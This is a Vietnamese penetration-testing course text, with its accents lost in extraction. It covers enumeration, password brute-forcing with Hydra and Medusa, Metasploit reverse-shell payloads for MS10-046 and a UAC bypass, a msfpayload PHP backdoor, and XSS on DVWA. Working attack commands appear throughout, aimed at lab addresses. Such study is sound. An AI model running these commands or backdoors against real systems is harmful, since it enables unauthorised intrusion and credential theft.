Thng tin cng chi tit v h iu hnh th n cng hu ch trong vic phn tch im yu. chng ta c th s dng k thut banner-grabbing, th ly thng tin t cc dch v FTP, telnet, SMTP, HTTP. y l cch n gin nht pht hin h iu hnh v phin bn m n ang chy. Theo , k thut ng n l k thut stack fingerprinting. N l mt k thut rt mnh cho php chng ta bit chc h iu hnh ch vi tin cy cao. Stack fingerprinting s yu cu ch nht mt cng ang lng nghe. Nmap c on c trong trng hp khng c cng no ang m.
37
Active OS detection gi cc gi tin n ch xc nh im c trng chi tit trong stack mng, iu ny cho php chng ta on h iu hnh. V phi gi cc gi tin nh th, nn rt d dng b pht hin. v th y khng phi l cch m hacker p dng tn cng. Nmap vi O xc nh h iu hnh.
b) Passive OS Detection
S dng passive stack fingerprinting. N tng t nh khi nim active stack fingerprinting. Thay v gi cc gi tin ti ch d dnh b pht hin. K tn cng m thm gim st giao thng mng xc nh h iu hnh ang s dng. V vy, bng vic gim st giao thng mng gia cc h thng khc nhau, chng ta c th xc nh c h iu hnh. K thut ny ph thuc vo v tr trung tm trn mng v trn cng cho php bt gi tin.
38
Chng 4:
I.
ENUMERATION
Enumeration l g? Enumeration (Lit k) l bc tip theo trong qu trnh tm kim thng tin ca t chc , xy ra sau khi scanning v l qu trnh tp hp v phn tch tn ngi dng, tn ma y ,ti nguyn chia s v cc dch v . N cng ch ng truy vn hoc kt n i t i mu c tiu co c nh ng thng tin hp l hn . Enumeration (lit k) c th c nh ngha l qu trnh trch xut nhng thng tin c c trong phn scan ra thnh mt h thng c trt t. Nhng thng tin c trch xut bao gm nhng th c lin quan n mc tiu cn tn cng, nh tn ngi dng (user name), tn my tnh (host name), dch v (service), ti nguyn chia s (share).Nhng k thut lit k c iu khin t mi trng bn trong. Enumeration bao gm c cng on kt ni n h thng v trc tip rt trch ra cc thng tin. Mc ch ca k thut lit k l xc nh ti khon ngi dng v ti khon h thng c kh nng s dng vo vic hack mt mc tiu . Khng c n thi t pha i ti m m t ta i khoa n qua n tri vi c hng ta c th tng ta i khon ny ln n mc co c quy n nh t cho phe p truy c p va o nhi u ta i khoa n hn a c p tr c y . Banner Grabbing K thut ch yu nht ca enumeration l banner grabbing, N c th c nh ngha n gin nh l kt ni n ng dng t xa v quan st u ra. N c nhiu thng tin cho k tn cng t xa. t nht chng ta cng xc nh c m hnh dch v ang chy m nhiu trng hp l to nn qu trnh nghin cu cc im yu. Phng chng: tt cc dch v khng cn thit. chng ta c th gii hn vic truy cp ti cc dch v iu khin truy cp mng. III. Enumerating cc dch v mng II.
1. Http fingerprinting
a) Telnet
TELNET (vit tt ca TerminaL NETwork) l mt giao thc mng (network protocol) c dng trn cc kt ni vi Internet hoc cc kt ni ti mng my tnh cc b LAN. Ti liu ca IETF, STD 8, (cn c gi l RFC 854 v RFC 855) c ni rng: Mc ch ca giao thc TELNET l cung cp mt phng tin truyn thng chung chung, c tnh lng truyn, dng rng 8 bit, nh hng byte. TELNET l mt giao thc khch-ch (client-server protocol), da trn nn TCP, v phn khch (ngi dng) thng kt ni vo cng 23 vi mt my ch, ni cung cp chng trnh ng dng thi hnh cc dch v. 39
S dng telnet tm hiu thng tin t cng dch v ang m, s dng cng c t xa ly thng tin thng qua cng telnet m hu ht cc h iu hnh iu h tr. C:\>telnet www.google.com 80
b) Netcat
L mt tool cho php ghi v c data thng qua giao thc TCP v UDP. Netcat c th s dng nh port scanner, backdoor, port redirecter, port listener, S dng netcat bng dng lnh: - Ch kt ni : nc [-ty_chn] tn_my cng1[-cng2]
- Ch lng nghe: nc -l -p cng [-ty_chn] [tn_my] [cng] V d: Ly banner ca Server: nc n 192.168.10.102, cng 80 Qut cng 40
c) Open SSL
L s n lc hp tc nhm pht trin b m ngun m vi y tnh nng, c trin khai trn giao thc SSL (version 2 v version 3) vgiao thc TSL(version 1) c qun l bi cng ng nhng ngi tnhnguyn trn ton th gii s dng Internet kt ni v pht trin bOpenSSL v cc ti liu c lin quan. Hu ht cc phn mm nh IMAP&POP, Samba, OpenLDAP, FTP,Apache v nhng phn mm khc u yu cu cng vic kim tra tnh xcthc ca ngi s dng trc khi cho php s dng cc dch v ny. Nhngmc nh vic truyn ti s xc minh thng tin ngi s dng v mt khu(password) dng vn bn thun ty nn c th c c hoc thay i bimt ngi khc. K thut m ha nh SSL s m bo tnh an ton v nguynvn ca d liu, vi k thut ny thng tin truyn trn mng dng im niim c m ha. Mt khi OpenSSL c ci t trn Linux server chng ta c th s dng n nh mt cng c th ba cho php cc ng dngkhc dng tnh nng SSL OpenSSL l mt b cng c mt m trin khai trn giao thc mng SSLv TLS v cc chun mt m c lin quan. Chng trnh OpenSSL l mt cng c dng lnh 41
s dng cc chcnng mt m ca cc th vin crypto ca OpenSSL t nhn. OpenSSL c cc th vin cung cp cc chc nng mt m cho cc ngdng nh an ton webserver. L phn mm m ngun m , c th s dng c cho c mc ch thng mi v phi thng mi vi tnh nng m ho mnh trn ton th gii, h tr cc giao thc SSLv2 v SSLv3 v TLSv1, cho c php m ho RSA v Diffie-Hellman, DSO. H tr cho OpenSSL v RSArefUS, nng cao kh nng x l cm mt khu i vi kho ring .Chng ch X.509 da vo xc thc cho c pha client v server, H tr danh sch thu hi chng ch X.509, kh nng ti iu chnh i vi mi URL ca cc tham s bt tay SSL.
2. DNS Enumeration
DNS Enumeration l qu trnh nh v tt c cc my ch DNS v tng ng ca h h s cho mt t chc. Mt cng ty c th c c hai ni b v bn ngoi my ch DNS c th mang li thng tin nh tn ngi dng, tn my tnh, v a ch IP ca h thng mc tiu tim nng. Hin c rt nhiu cc cng c c th c s dng c c thng tin cho thc hin DNS lit k. Cc v d v cc cng c c th c s dng lit k DNS nslookup, DIN, Registry M cho s Internet (ARIN), v Whois. k khai DNS, chng ta phi c s hiu bit v DNS v lm th no n hot ng. Chng ta phi c kin thc v cc bn ghi DNS. Danh sch cc bn ghi DNS cung cp mt ci nhn tng quan cc loi bn ghi ti nguyn (c s d liu h s) c lu gi trong cc tp tin khu vc ca tn min System (DNS). DNS thc hin mt c s d liu phn tn, phn cp, v d phng thng tin lin kt vi cc tn min Internet v a ch. Trong nhng min my ch, cc loi h s khc nhau c s dng cho cc mc ch khc nhau. Danh sch sau y m t bn ghi DNS ph bin cc loi v s dng ca h: A (a ch)-Bn mt tn my ch n mt a ch IP SOA (Start of Authority)-Xc nh my ch DNS c trch nhim cho cc tn min thng tin CNAME (tn kinh in)-Cung cp tn hoc b danh cho a ch ghi MX (th trao i) Xc nh cc my ch mail cho tn min SRV (dch v)-Nhn dng cc dch v nh dch v th mc PTR (pointer)-Bn a ch IP lu tr tn NS (tn my ch)-Xc nh my ch tn khc cho tn min 42
DNS Zone Transfer thng c s dng ti to d liu DNS trn mt s my ch DNS, hoc sao lu cc tp tin DNS. Mt ngi s dng hoc my ch s thc hin mt yu cu chuyn giao khu vc c th t mt name server.Nu my ch tn cho php di chuyn vng xy ra, tt c cc tn DNS v IP a ch lu tr bi cc my ch tn s c tr li trong vn bn ASCII con ngi c th c c. Nslookup
Ta cng c th dng lnh trc tip nh sau: Nslookup type=any tuoitre.vn Type l loi dch v mng, nh lit k trn: NS(nameserver), MX(mail exchange), any(tt c). Tuoitre.vn: mt domain
43
3. Netbios name
NetBIOS l mt t vit tt cho mng Basic Input / Output System. N cung cp cc dch v lin quan n lp phin ca m hnh OSI cho php cc ng dng trn cc my tnh ring giao tip qua mt mng cc b. Tht s nh mt API, NetBIOS khng phi l mt giao thc mng. H iu hnh c hn chy NetBIOS trn IEEE 802,2 v IPX / SPX s dng tng ng giao thc Frames NetBIOS (NBF) v NetBIOS trn IPX / SPX (NBX) . Trong cc mng hin i, NetBIOS bnh thng chy trn giao thc TCP / IP thng qua NetBIOS qua giao thc TCP / IP (NBT) .iu ny dn n tng my tnh trong mng c c mt tn NetBIOS v mt a ch IP tng ng vi mt (c th khc nhau) tn my ch. NetBIOS name l c ch t tn cho cc ti nguyn trong 1 h thng theo khng gian phng (khng c khi nim phn cp).
44
Chng 5:
I.
PASSWORD CRACKING
Gii Thiu L qu trnh tm kim hoc phc hi password vi nhiu mc ch khc nhau.
Mc ch ca vic password cracking l gip cho ngi dng c th ly li mt khu qun trc , hoc chim ot quyn truy cp khng xc thc ti h thng. II. Cc K Thut Password Cracking Attacks s s dng file t in c sn cha cc hash so snh vi hash ca password tm ra dng plaint text ca password nu hash trng nhau. Chng ta c th thm hoc o cc t c trong t in (Hybird Attacks). Dng ny ng dng tt khj password l nhng k t thng thng, tc nhanh, mc thnh cng ty thuc vo t in.
2. Brute Forcing Attacks
S dng mi t hp ca tt c cc k t a vo hash v so snh. Kh nng thnh cng l tuyt i nu c thi gian v tc crack rt lu trong trng hp password di v phc tp. ch tt cho password ngn.
3. Syllable Attacks/Pre-Computed Hashes
Kt hp hai cch trn bng cch to sn cc bn hash ca tt c t hp cc k t v ch so snh trong qu trnh hash. Tc crack ch mt vi pht nu c sn cc bn hash. III. Cc Kiu Tn Cng Thng Gp
Tm 1 username co th c va do ti m password theo username o .Qu trnh ny c th t ng ho tng tc tm kim . Cc dng tn cng kiu Active Password Cracking: o Password guessing: mt tp hp t in cc t v tn cng nh mt khu v th tt c s kt hp crack cc password. Kiu tn cng ny cn nhiu thi gian v lng bng thng mng ln; d dng bi pht hin. o Trojan/Spyware/Keylogger: l chng trnh chy nn gip cho k tn cng c th ghi li bt k phm no c nhn (Keylogger); 45
thu thp thng tin mt cch b mt v c nhn, t chc (Spyware); vi s gip ca Trojan, k tn cng c th ly quyn truy cp vo cc password c lu tr v c th c cc ti liu c nhn, xa file.
2. Passive Password Cracking
Capture qua trnh log -in trn ng truy n break password offline(Sniff, MITM) Cc kiu tn cng ny bao gm: o Wire Sniffing: k tn cng chy cc cng c sniffing gi tin trong mng LAN truy cp v ghi li cc giao thng mng ang sng. D liu bt c c th s bao gm password c gi ti cc h thng t xa thng qua cc giao dch Telnet, FTP, rlogin v mail in t gi v nhn. o Man-in-the-Middle (MITM) and Replay Attack: Trong tn cng MITM, attacker ginh quyn truy cp vo knh giao tip gia nn nhn v server tm kim thng tin; trongreplay attack, cc gi tin v th bi (token) xc thc c bt s dng mt sniffer.
3. Offline Password Cracking
Tip xc trc tip vi my tnh nn nhn copy cc file lu tr thng tin. V d, SAM database trn Windows (%systemroot%/system32/config) hay /root/passwd trn Linux. Sau c th s dng John tm password dang plain text. IV. Cc cng c Password Cracking
1. Hydra
a) Gii thiu
Hydra l mt cng c b kha ng nhp mng rt nhanh, h tr nhiu giao thc v dch v khc nhau. Hydra l trnh b kha ng nhp xong xong, ngha l n chy nhiu tc v cung mt lc qu trnh b kha c nhanh hn. Cng c ny cho php cc nh nghin cu v chuyn gia bo mt c th trnh by mc d dng chim quyn truy cp khng xc thc t xa ti h thng no
46
b) Cch dng
C php chung ca Hydra l: Hydra [[-l LOGIN|-L FILE] [-p PASSWORD|-P FILE]]|[-C FILE]] [-t task] [-w wait] [server server | IP] [service://server[:port]]
V d: 47
login.txt
password.txt
192.168.10.1
http-get
-f: finish:tm c cp username v password hp l u tin s kt thc -L: file username (-l username) -P: file password (-p password) 192.168.10.1: a ch ip cn b kha mt khu ng nhp http-get: dch v http cng 80 (http c thay th bng http-get v httphead) http://192.168.10.1 l trang web cn cho qu trnh crack.
2. Medusa
a) Gii thiu
Medusa c th c s dng brute-force ng nhp theo tng module theo c ch song song v nhanh chng. mc ch ca n l h tr nhiu dch v m c th cho php qu trnh xc thc t xa nu c th. Medusa c thit k da vo ba c im sau: Kim tra song song da vo lung: c th kim tra trn nhiu host, username, password. Thit k theo module: Mi dch v tn ti dng file (.mod) c lp. Chng ta khng cn thit chnh sa n nhn m rng danh sch cc dch v h tr for vic brute-forcing.
48
b) Cch dng
C php: Medusa [h host | -H file] [-u username | -U file] [-p password | -P file] [-C file] M module [OPT] -h host hay a ch IP, -H file cha cc host 49
-u username, -U file cha username -p password, -P file cha password -C file kt hp dng host, username, password dng host:username:password -M module l bt buc theo sau l tn cc module c h tr. xem tt c cc module ta g: medusa d v cch dng chi tit cho 1 module no : medusa M tn_module q
50
V.
y l giao thc chuyn i siu vn bn v thng c s dng cho cc ng dng Web (World Wide Web WWW) trn cng mc nh l 80.
d) C 2 dng m ha HTTP:
Basic access authentication: l phng php trnh duyt web hoc cc chng trnh khc cung cp username v password when c yu cu. N h tr tt c cc trnh duyt web, tuy nhin, c username v password c gi i dng plain text nn t c p dng vo thc t. V qu trnh ng nhp vo router l mt v d in hnh.
51
52
Nh trn hnh username v password bt c: admin:12345 Digest access authentication: l mt trong nhng phng php c tha thun p dng cho my ch web c th vt qua cc thng tin vi trnh duyt web ca ngi dng. N s dng hm bm(hash) m ha cc thng tin nhy cm trc khi gi chng qua mng.
e) Crack Password HTTP
53
54
Vo Terminal trn BackTrack 5 g: hydra f L login.txt P password.txt 192.168.10.1 http-get http://192.168.10.1 Trong : -f: finish:tm c cp username v password hp l u tin s kt thc -L: file username (-l username) -P: file password (-p password) 192.168.10.1: a ch ip cn b kha mt khu ng nhp http-get: dch v http cng 80 (http c thay th bng http-get v httphead) http://192.168.10.1 l trang web cn cho qu trnh crack.
55
Hoc: medusa h 192.168.10.1 U login.txt P password M http Trong : -h host hay a ch ip cn b kha mt khu ng nhp. -U: file username (-u username) -P: file password (-p password) -M http giao thc cn crack. M vit tc cho modum
56
57
SSH l mt giao thc mng cho vic giao tip d liu bo mt, cc dch v shell t xa hoc thc thi lnh vn cc dch v mng bo mt khc gia cc my tnh c ni mng vi nhau. N kt ni thng qua mt knh bo mt trn mt mng khng bo mt: mt my ch v mt my khch (chy cc chng SSH server v SSH Client). ng dng c bit n nhiu nht ca giao thc ny l vic truy cp n ti khon shell ca h iu hnh LIKE-UNIX (LINUX). N sinh ra thay th cc chun giao thc khng bo mt khc nh telnet, rsh, rexec , khi m password c gi i dng plain text, c th d dng c c. SSH hot ng trn TCP cng 22.
b) Crack password qua SSH
58
59
60
SMB c bit n nh l Common Internet File System (CIFS), hot ng tng ng dng trong m hnh OSI, thng thng c s dng cung cp truy cp chia s cc file, my in v cc giao tip khc nhau gia cc nt mng trn mng. N cn cung cp k thut giao tip lin qu trnh c xc thc. Hu ht s dng ca SMB u lin quan n Microsoft Windows. SMB c th chy trn tng giao dch (Session) hoc thp hn: o Trc tip trn TCP cng 445; o Thng qua NetBIOS (cung cp nhiu dch v lin quan n tng ng dng trong m hnh OSI cho php cc ng dng trn cc my tnh phn bit c th giao tip vi nhau thng qua mng LAN) trn UDP cng 137, 138 v TCP 137, 139
b) Crack password SMB
Qut xem c my no ang chy dch v smb port 445 hay khng?
61
62
63
RDP l mt giao thc giao tip ca c nhn hay t chc c pht trin bi Microsoft, cung cp cho ngi dng mt giao din ha i vi my tnh khc. Hin ti, Microsoft chuyn phn mm ch (server) RDP sang Remote Desktop Services nh Terminal Services (dch v u cui) v phn mm khch (client) nh l Terminal Services Client. Khi thc hin kt ni n mt my tnh no t xa, chng ta s nhn c yu cu xc thc ngi dng v mt khu ph hp. V vy vic crack password RDP l cn thit nu ta truy cp m cha c s chp nhn ca ngi dng. RDP hot ng trn TCP cng 3389
b) Crack password RDP
64
Vi Medusa, n khng h tr trc tip giao thc RDP. Tuy nhin, ta c th dng modum wrapper vi script l rdesktop. Ta thc hin nh sau:
65
Medusa M wrapper m TYPE:STDIN m PROG:rdesktop m ARGS:-u %U p - %H h 192.168.10.100 U login.txt P password.txt Tuy vy, chng trnh vn hot ng cha ng n lm v tn nhiu thi gian v phi k tn cng phi nhp vo tng password mt. y l cch dng rdesktop iu khin my tnh t xa vi username v password tm c:
66
Chng 6:
I. GII THIU V METASPLOIT
SYSTEM HACKING
1. Gii thiu
Metasploit l mt d n bo mt my tnh cung cp cc thng tin v vn l hng bo mt cng nh gip v kim tra thm nhp v pht trin h thng pht hin tn cng mng. Mt d n con rt ni ting ca Metasploit l Metasploit Framework. Metasploit Framework l mt mi trng dng kim tra ,tn cng v khai thc li ca cc service. Metasploit c xy dng t ngn ng hng i tng Perl, vi nhng components c vit bng C, assembler, v Python.Metasploit c th chy trn hu ht cc h iu hnh: Linux, Windows, MacOS. Chng ta c th download chng trnh ti www.metasploit.com Metasploit c phin bn hin ti l 4.4.
2. Cc thnh phn ca Metasploit
Metasploit h tr nhiu giao din vi ngi dng: Console interface: dng lnh msfconsole. Msfconsole interface s dng cc dng lnh cu hnh, kim tra nn nhanh hn v mm do hn Web interface: dng msfweb, giao tip vi ngi dng thng qua giao din web Command line interface: dng msfcli Enviroment : Global Enviroment:c thc thi thng qua 2 cu lnh setg v unsetg, nhng options c gn y s mang tnh ton cc, c a vo tt c cc module exploits Temporary Enviroment: c thc thi thng qua 2 cu lnh set v unset, enviroment ny ch c a vo module exploit ang load hin ti, khng nh hng n cc module exploit khc Chng c th lu li enviroment mnh cu hnh thng qua lnh save. Mi trng s c lu trong ./msf/config v s c load tr li khi user interface c thc hin
3. S dng Metasploit Framework
a) Chn module exploit
show exploits: xem cc module exploit m framework c h tr use exploit_name: chn module exploit info exploit_name: xem thng tin v module exploit Chng ta nn cp nht thng xuyn cc li dch v cng nh cc module trn www.metasploit.com hoc qua lnh msfupdate hoc svn update /opt/metasploit/msf3/
b) Cu hnh module exploit chn
show options: Xc nh nhng options no cn cu hnh set : cu hnh cho nhng option ca module Mt vi module cn c nhng advanced options, chng ta c th xem bng cch gdng lnh show advanceds
c) Verify nhng options va cu hnh
La chn h diu hnh no thc hin show targets: nhng target c cung cp bi module set: xc nh target no vd: msf> use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
e) La chn payload
Payload l on code m s chy trn h thng remote machine, l mt phn ca virus my tnh thc thi m c. show payloads: lit k ra nhng payload ca module exploit hin ti info payload_name: xem thng tin chi tit v payload set payload payload_name: xc nh payload module name.Sau khi la chn payload no, dng lnh show options xem nhng options ca payload show advanced: xem nhng advanced options ca payload
f) Thc thi exploit
exploit: lnh dng thc thi payload code. Payload sau s cung cp cho chng ta nhng thng tin v h thng c khai thc
4. Gii thiu Payload Meterpreter
Meterpreter, vit tt t Meta-Interpreter l mt payload nng cao c trong Metasploit Framework. Muc ch ca n l cung cp nhng tp lnh khai thc, 68
tn cng cc my remote computers. N c vit t cc developers di dng shared object (DLL) files. Meterpreter v cc thnh phn m rng c thc thi trong b nh, hon ton khng c ghi ln a nn c th trnh c s pht hin t cc phn mm chng virus Meterpreter cung cp mt tp lnh chng ta c th khai thc trn cc remote computers: Fs(Filesystem): cung cp qu trnh tng tc vi filesystem Net: cho php xem thng tin mng ca remote machine nh IP, route table Process:cho php to tng tc vi cc tin trnh trn remote machine Sys: cho php xem thng tin h thng, mi trng ca remote machine
a) S dng module Fs
cd directory:ging lnh cd ca commandline, chuyn th mc lm vic getcwd:cho bit th mc ang lm vic hin ti ls:lit k cc th mc v tp tin upload src1 [src2 ...] dst:upload file t src ti dst. download src1 [src2 ...] dst:download file t src ti dst.
b) S dng module Net
ipconfig:xem cu hnh ca card mng ca my tnh t xa route:xem bng nh tuyn ca remote machine
c) S dng module Process
execute -f file [ -a args ] [ -Hc ]:Cu lnh execute cho php to ra mt process mi trn remote machine v s dng process khai thc d liu kill pid1 pid2 pid3:hu hoc tt cc process ang chy trn my remote machine ps:lit k nhng process ca remote machine
d) S dng module Sys
getuid: cho bit username hin ti ca remote machine sysinfo:cho bit thng tin v my tnh nn nhn: h iu hnh, phin bn, nn tn 32bits hay 64bits
69
Thng xuyn cp nht cc bn v li ca Microsofts. V d nh Metasploit khng th khai thc c li Lsass_ms04_011, chng ta phi cp nht bn v li ca Microsoft. Theo Microsoft nh gi, y l mt li nghim trng, c trn hu ht tt c cc h iu hnh windows. Chng ta nn s dng hotfix c number l 835732 v li trn. II. Li MS10-046 (2286198)
1. Gii thiu
y l mt li rt nghim trng lin quan n Windows Shellca cho tt c cc h iu hnh b nh hng, cho php k tn cng chim ly ton quyn iu khin Windows v thc thi m ngun t xa. Li ny c pht hin vo thng 06/2010 v n thng 08/2010, Microsoft tung ba bn v li. Li nguy him ny nm trong cc tp tin "shortcut" (*.lnk) ca Windows, cc tp tin ny thng nm giao din desktop hay trnh n Start. Bng cch to ra mt tp tin shortcut nhng m c, tin tc c th t ng thc thi m c khi ngi dng xem tp tin shortcut hay ni dung ca mt th mc cha tp tin shortcut nhng m c. Cc bn Windows b nh hng bao gm.
70
H iu Hnh Windows Server 2008 for 32-bit Systems and Windows Server 2008 for 32-bit Systems Service Pack 2* Windows Server 2008 for x64-based Systems and Windows Server 2008 for x64-based Systems Service Pack 2* Windows Server 2008 for Itanium-based Systems and Windows Server 2008 for Itanium-based Systems Service Pack 2 Windows 7 for 32-bit Systems Windows 7 for x64-based Systems Windows Server 2008 R2 for x64-based Systems* Windows Server 2008 R2 for Itaniumbased Systems
Windows Server 2003 Service Pack 2 Windows Server 2003 x64 Edition Service Pack 2 Windows Server 2003 with SP2 for Itanium-based Systems Windows Vista Service Pack 1 and Windows Vista Service Pack 2 Windows Vista x64 Edition Service Pack 1 and Windows Vista x64 Edition Service Pack 2
2. Cc bc tn cng:
Dng lnh: show options xem cc tham s cn thit c th tin hnh tn cng c: o SRVHOST: a ch my ca k tn cng, lng nghe c nn nhn no kt ni n hay khng o SRVPORT: cng lng nghe, mc nh l http (80)
73
Ta s: o set PAYLOADwindows/meterpreter/reverse_tcp o set SRVHOST 192.168.1.200 o set lhost a ch IP: set LHOST 192.168.1.200. LHOST l tham s ca PAYLOAD m ta va set trn.
74
Trn my tnh nn nhn, to 1 shortcut bng cch nhn phi chut vo Desktop -> New -> Shortcut
75
76
77
V by gi th mi vic tr nn d dng hn, khi k tn cng iu khin c my nn nhn vi ton quyn. V d: Lnh sysinfo ly thng tin ca my nn nhn: Lnh hashdump ly mt khu ca ngi dng di dng hash
78
79
Bn v li c tn m l KB2286198 cha ng phin bn mi ca tp tin Shell32.dll, y l phn cp nht quan trng. Shell32.dll l mt tp tin th vin rt quan trng trong Windows, n cha ng mt s hm Windows Shell API. Nu Shell32.dll b li hay cp nht li, my tnh s c tnh trng "Mn hnh xanh cht chc" hay Blue Screen. III. Li BYPASSUAC
1. Gii thiu
T Windows Vista tr v sau, Microsoft gii thiu mt tin ch c xy dng sn l User Access Control (UAC). UAC lm tng tnh bo mt ca Windows bng cch gii hn cc phn mm ng dng ca nhm quyn ngi s dng c bn. V vy, ch nhng phn mm c ngi dng tin tng mi nhn c quyn qun tr, nhng phn mm khc th khng. Tuy nhin, vi ti khon ca ngi qun tr, cc ng dng vn b gii hn nh nhng ti khon thng khc. Cc h iu hnh c tch hp sn User Access Control iu b nh hng v c th khai thc.
2. Cc bc tn cng
use exploit/multi/handler. y l mt modume cung cp nhiu chc nng ca h thng payload Metasploit cho chng ta khai thc bng cch 80
thc hin: run post/windows/escalate/bypassuac nh l v d trong trng hp ny v cn nhiu th khc na. set PAYLOAD windows/meterpreter/reverse_tcp: cho php kt ni li vi my tnh tn cng d dng iu khin. set LHOST 192.168.1.202: host lng nghe, a ch IP ca my tn cng set LPORT 6789:port lng nghe, ty min l cha c s dng.
81
82
Sau khi to xong, ta copy file backdoor.exe n my tnh nn nhn v thc thi. Chng ta c th s dng Samba chia s file gia Windows v Linux. Trn my tnh Windows, ta s share file vi ton quyn truy cp:
83
Tr li my tnh nn nhn, v thc thi file backdoor.exe va copy. Khi trn my tnh nn nhn chng ta s nhn c nh sau:
Ta c 1 phin lm vic vn cha iu khin ton quyn c. thc hin ta cn thc hin lnh: run post/windows/escalate/bypassuac
84
Rt tic l cho n thi im hin ti, Microsoft vn cha xc nhn li trong UAC cng nh cung cp bn v cho l hng bo mt ny. Mt pht ngn vin ca Microsoft khng nh khng c l hng vo trong UAC c. V th, chng ta cn ci t phn mm dit virus, backdoor c uy tnh trn th trng trnh b li dng.
85
Chng 7:
I. Gii thiu i vi nhng chng ta mi nghin cu hacking, mi trng th nghim l rt quan trng, tuy nhin tm c mi trng thc t, ph hp vi trnh li khng n gin. Ngc li, i vi nhng ngi c trnh v kinh nghim hacking, chc hn cc chng ta cng c nhu cu th nghim trnh hacking ca mnh n u cng nh nng cao thm kh nng bn thn. Vy th DVWA- Damn Vulnerable Web Application c th p ng nhu cu ca c nhng ngi mi vo cng nh nhng ngi c trnh nht nh. DVWA l mt framework xy dng sn nhng l hng bo mt theo top 10 im yu bo mt Web ca OWASP. Trnh t mc low n high c th p ng nhu cu hack ca rt nhiu ngi. Vy DVWA l mt ng dng web PHP / MySQL b li. Mc tiu chnh ca n l gip cho cc chuyn gia an ninh kim tra k nng v cng c ca h trong mt mi trng hp php, gip cc nh pht trin web hiu r hn v cc qu trnh m bo cc ng dng web v h tr gio vin / hc sinh ging dy / hc bo mt ng dng web trong mt mi trng lp hc. II. Hng dn ci t DVWA trn Backtrack Do y l framework trn nn php nn n gin cc chng ta dng webserver bng XAMPP trc, ri copy DVWA vo, chng ta s s dng DVWA trn giao din web.
1. Ti v ci t XAMPP
86
Khi ng XAMPP ln
87
Sau cng l m trnh duyt web ln v g http://localhost ta s c giao din chnh ca XAMPP nh hnh bn di:
2. Ti v ci t DVWA
88
89
Ch : Phi bt XAMPP ln trc th mi c th chy DVWA. Ti giao din ng nhp ca DVWA, cc chng ta ng nhp bng acc/pass mc nh l admin/password. Chun b trc khi tn cng: M trnh duyt web, g: localhost/dvwa. C th s dng dia_chi_ip/dvwa
90
khai thc cc li trn DVWA(XSS, SQL Injection), chng ta phi thit lp Security Level l Low. V khi , nhng on code c thm vo s c gi nguyn. Vi mc High, s dng hm htmlspecialchars() chuyn cc k t c bit, khng ging vi lc nhp ban u. mc Medium, chui <script> s b xa i nn khng bi nh hng. Tuy nhin, cc th html khc vn b nh hng bnh thng. V th chng ta thit lp Security Level l low: Chn DVWA Security -> Low -> Submit
91
Cross-Site Scripting hay cn c gi tt l XSS (thay v gi tt l CSS trnh nhm ln vi CSS-Cascading Style Sheet ca HTML) l mt k thut tn cng bng cch chn vo cc website ng (ASP, PHP, CGI, JSP ...) nhng th HTML hay nhng on m script nguy him c th gy nguy hi cho nhng ngi s dng khc. Trong , nhng on m nguy him c chn vo hu ht c vit bng cc Client-Site Script nh JavaScript, JScript, DHTML v cng c th l c cc th HTML. XSS l mt trong nhng li ph bin, c rt nhiu trang web b mc phi li ny, chnh v th ngy cng c nhiu ngi quan tm n li ny!
b) Phn loi XSS
Stored XSS l hnh thc tn cng m cho php k tn cng c th chn mt on script nguy him (thng l Javascript) vo website ca chng ta thng qua mt chc nng no (vd: vit li bnh, guestbook, gi bi..), t khi cc thnh vin khc truy cp website s b dnh m c t k tn cng ny, cc m c ny thng c lu li trong database ca website chng ta nn gi l Stored. Stored XSS pht sinh do chng ta khng lc d liu do thnh vin gi ln mt cch ng n, khin cho m c c lu vo Database ca website. 92
Trong hnh thc ny, k tn cng thng gn thm on m c vo URL ca website chng ta v gi n nn nhn, nu nn nhn truy cp URL th s b dnh m c. iu ny xy ra do ta khng ch filter input t URL ca website mnh. XSS Attack Consequences Phng php ny tng t nh 2 phng php trn. Tuy nhin, im khc bit l cch m payload c a ti server. Mt site read only hay brochureware cng c thn him XSS. XSS c th gy thit hi t mc nh n ln nh vic chim ti khon ca ngi s dng. Mt cuc tn cng XSS c th ly c session cookie, gy mt ti khon s dng. Hoc c th nh hng ti d liu ngi dng u cui bng cch ci t Trojan, hoc redirect trang web ngi truy cp sang mt trang khc, hoc thay i ni dung ca mt trang.
c) Tm hiu v hot ng XSS
93
M t hot ng ca XSS Theo nguyn tc trn, mt hacker c th li dng cc l hng bo mt t mt website. Cc th HTML u c th l cng c cho cc cuc tn cng bi k thut XSS, trong 2 th IMG v IFRAME c th cho php trnh duyt load thm cc website khc khi cc lnh HTML c hin th. Li dng nguyn tc ny, cc hacker c th chn cc on m c vo v khin my nn nhn b tn cng XSS
d) Tc hi ca XSS
XSS thng c s dng vi cc mc ch sau: nh cp thng tin Gip hacker c th truy cp c vo nhng thng tin nhy cm Ly c quyn truy cp min ph vo nhng ni dung ng ra phi tr tinmi c c D xt s thch ca ngi s dng mng Thay i din mo ( deface) mt trang web no Tn cng t chi dch v (DoS) M JavaScript c c th truy cp bt c thng tin no sau y: - Cookie c nh (ca site b li XSS) c duy tr bi trnh duyt. - RAM Cookie (ca site b li XSS). - Tn ca tt c cc ca s c m t site b li XSS. - Bt c thng tin m c th truy cp c t DOM hin ti (nh value, m HTML).
94
e) Tn cng XSS
Thc hin script: <script>alert(XSS); </script> hin thng bo trn trnh duyt web
95
Chng ta c th gi cookie ny v trc tip my tn cng thay v ch hin ln mn hnh. Chng ta c th chn cc th iframe vo: <iframe src=http://www.ctu.edu.vn></iframe>
Ngoi ra, chng ta c th s dng Metasploit Framework (gii thiu trn) tn cng chim quyn iu khin cng vi backdoor cho php my tnh mc tiu kt ni li. Code to backdoor: Msfpayload php/meterperter/reverse_tcp lhost=192.168.10.102 lport=4444 R > forum.php 96
Sau khi thc thi script trn xong, Metasploit Framework m kt ni n v chng ta c th tn cng.
Mt s hnh nh tn cng:
98
99
Ngi ta khng lng ht c mc nguy him ca XSS nhng cng khng qu kh khn ngn nga XSS. C rt nhiu cch c th gii quyt vn ny. OWASP (The Open Web Application Standard Project) ni rng c th xy dng cc website bo mt cao, i vi cc d liu ca ngi s dng, nn: Ch chp nhn nhng d liu hp l. T chi nhn cc d liu hng. Lin tc kim tra v thanh lc d liu. Nhng ngi pht trin web c th bo v website ca mnh khi b li dng thng qua tn cng XSS, bng cch m bo nhng trang pht sinh ng khng cha cc tag ca script bng cch lc v xc nhn hp l cc d liu u vo t pha ngi dng hoc m ha(endcoding) v lc cc gi tr xut cho ngi dng.
2. SQL Injection
a) SQL Injection l g?
